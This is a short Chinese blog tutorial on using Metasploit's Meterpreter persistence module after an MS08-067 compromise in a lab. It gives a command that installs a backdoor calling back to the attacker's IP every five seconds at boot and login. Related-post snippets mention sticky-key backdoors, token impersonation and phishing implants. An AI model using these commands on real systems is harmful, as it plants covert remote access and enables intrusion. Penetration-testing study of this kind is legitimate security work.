Kali 中 Persistence后门的使用

最新推荐文章于 2023-05-07 19:40:32 发布
最新推荐文章于 2023-05-07 19:40:32 发布
阅读量3.4k 收藏 18
点赞数 1
分类专栏: Kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nzjdsds/article/details/82313635
版权

这里我就用最经典的漏洞ms08_067进行演示

 

靶机:192.168.193.128

攻击机:192.168.193.135

 

这里我就省去ms08_067漏洞的使用过程,直接讲当ms08_067拿到shell之后的操作

 

这里我们已经拿到权限了

 

然后执行 run persistence -S -U -X -i 5 -p 446 -r 192.168.193.135

-S:系统启动时加载

-U:用户登陆时加载

-X:开机时自动加载

-i:回连的时间间隔

-r:你的接收shell的电脑IP

 

这样电脑在系统登陆,用户登陆,开机,使用中每个5秒都会回连你的机器

然后我们下次在登陆使用下面的漏洞利用模块和攻击载荷

这个模块就是负责监听的,记得设置下自己的IP和回连的端口

然后很快就会有回弹

大方子
关注
  • 1
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
Kali Linux安装到优盘并实现文件的持久存储(3)
henter的专栏
07-18 3067
本文介绍了将Kali Linux安装到优盘,并实现文件的持久存储的方法。
kali文指南.pdf
01-24
该文档适合新手和英文不是很好的用户,主要文档内容为kali常用工具使用说明。
国外的kali usb persistence制作工具教程(亲测可用)
02-12
kali usb persistence制作工具打包以及详细视频教程。 不过教程是英文版,比较简单,容易懂的。。。。
kali工具使用.pdf
09-14
kali工具使用.pdf
kali 文手册
06-28
kali官方自己出的文手册,内容比较详细,喜欢的小伙伴来收
Kali Linux系统使用基础教程.zip
06-28
Kali Linux系统使用基础教程.zip
kali persistence 设置 (kali 1.0.9a) done!
hotday_Kevin的专栏
10-17 2459
一、将kali安装到U盘,建议使用
制作 Kali Linux 随身 U 盘并实现持久化
人人都懂物联网
08-27 1万+
制作 Kali Linux 随身 U 盘 Kali Linux 的前身是 BackTrack Linux 发行版。Kali Linux 是一个基于 Debian 的 Linux 发行版,包括很多安全和取证方面的相关工具。它由 Offensive Security Ltd 维护和资助,最先由 Offensive Security 的 MatiAharoni 和 Devon Kearns 通过重写 Back Track 来完成。Back Track 是基于 Ubuntu 的一个 Linux 发行版。 Kali
渗透测试——后渗透攻击
YT的博客
02-18 6134
Meterpreter 是一个提供了运行时刻可扩展远程 API 调用的攻击载荷模块,后渗透攻击脚本由 Meterpreter 客户端所解释,再远程调用 Meterpreter 服务端 (即运行在目标机上的攻击载荷) 提供的 API 来实现的。 1. persistence 后渗透攻击模块 persistence 帮助信息如下: 输入命令:run persistence -X -i 5 -p 4...
钓鱼网站+persistence植入后门程序+创建用户
小王的储物间
02-21 752
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
Kali Linux系统使用基础教程.pdf
11-29
Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的...
MSF之Persistence后门
weixin_46104215的博客
09-27 2418
Persistence:一款使用安装自动方式的持久性后门程序,可以利用它创建注册和文件 一、实验环境 攻击主机:2021 Kali (ip:192.168.110.130) 靶机:win7(专业版) (ip:192.168.110.134) 准备:先通过攻击获取一个 meterpreter shell(之前的文章有介绍的 ms17-010漏洞) 二、实验步骤 1.获得 meterpreter shell 之后,输入 run persistence -A -S -U...
kali linux2.0权限不够,kalilinux-权限提升-Go语言文社区
weixin_42169674的博客
04-29 543
meterpeter:可以在 Meterpreter 使用 incognito 来开始模拟过程:use incognito展示 incognito 的帮助文档,通过输入 help 命令:help获得可用用户的列表list_tokens –u模拟攻击impersonate_token willie-pcwillie本地提权攻击:getsystem如果你尝试获得 Windows 7 主机的访问,你必须...
Kali Linux USB Live Persistence模式
热门推荐
Kylin_7的博客
05-11 2万+
Kali Linux USB Live Persistence
渗透测试 ( 4 ) --- Meterpreter 命令详解
freeking101的博客
07-02 7469
Meterpreter 是 Metasploit 框架的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell 的链接。Meterpreter shell 作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开 shell、得到用户密码、上传下载远程主机的文件、运行 cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络.
Meterpreter 控制持久化
Epsilon
03-01 6055
Meterpreter 的 persistence 脚本允许注入 Meterpreter 代理,以确保系统重启之后 Meterpreter 还能运行。如果是反弹连接方式,可以设置连接攻击机的时间间隔。如果是绑定方式,可以设置在指定时间绑定开放端口。 如下所示,我们运行 persistence 脚本让系统开机自启动 Meterpreter (-X),10秒 (-i 10) 重连一次,使
内网权限维持
wuxinweii的博客
11-10 2762
攻击者在提升权限后,往往会通过建立后门来维持对目标主机的控制权。这样一来,即使修复了被攻击者利用的系统漏洞,攻击者还是可以通过后门继续控制目标系统 一、粘贴键后门 windows 系统下连续按 5 次 shift 可调出其程序,粘滞键是为了那些按钮有困难的人设计的,就是按键困难,那么如果用 ctrl+c,ctrl+v 这种快捷键或者其他需要组合的键时,就会有困难,不具备一次按两个或多个键的能力,那么此时就可以单按 5 下 shift 键来启动粘滞键功能。 所以我们可以通过更改注册表的命令来进行后门维持 在命
12.3、后渗透测试--持久化后门
无痕的博客
12-13 1852
metasploit后渗透测试--持久化后门
kali生成后门远程控制电脑或手机
wutiangui的博客
05-07 3072
问题:Metasploit渗透测试出的错误 Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).点击.exe文件直接运行安装,运行,下一步,直接完成安装。Android模拟器(靶机1):192.168.0.106。2.1首先从官网上下载模拟器雷电地址点击打开链接。靶机:192.168.25.106。二、环境配置二Android模拟器。
kalidirsearch的使用
最新发布
08-29
Kali Linux,dirsearch是一个常用的脚本工具,用于扫描目标网址的目录和文件。要使用dirsearch,你需要按照以下步骤进行操作: 1. 首先,在Kali Linux下载dirsearch脚本工具。可以使用以下命令来下载: ``` git clone https://github.com/maurosoria/dirsearch ``` 这个命令会将dirsearch的脚本工具下载到当前目录下。 2. 下载完成后,可以使用以下命令查看下载的dirsearch脚本工具的文件夹: ``` ls -l ``` 这个命令会列出dirsearch的文件夹及其内容。 3. 进入到dirsearch的目录。使用以下命令进入目录: ``` cd dirsearch ``` 进入目录后,你就可以开始使用dirsearch进行扫描了。 4. 使用以下命令来运行dirsearch进行扫描: ``` python3 dirsearch.py -u 目标地址 -e* ``` 这个命令,你需要将"目标地址"替换为你要扫描的网址。其,"-e*"表示对所有文件扩展名进行扫描。 注意:如果你在Windows上使用Kali,命令稍有区别,可以使用以下命令来运行dirsearch: ``` dirsearch -u 目标地址 -e* ``` 以上就是在Kali Linux使用dirsearch的基本步骤,希望对你有所帮助。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [网络安全工程师与白帽子黑客教你:通过dirsearch脚本扫描和收集网站敏感文件实战](https://blog.csdn.net/xiao1234oaix/article/details/108941093)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [kali-dirsearch](https://blog.csdn.net/m0_53008479/article/details/120254692)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值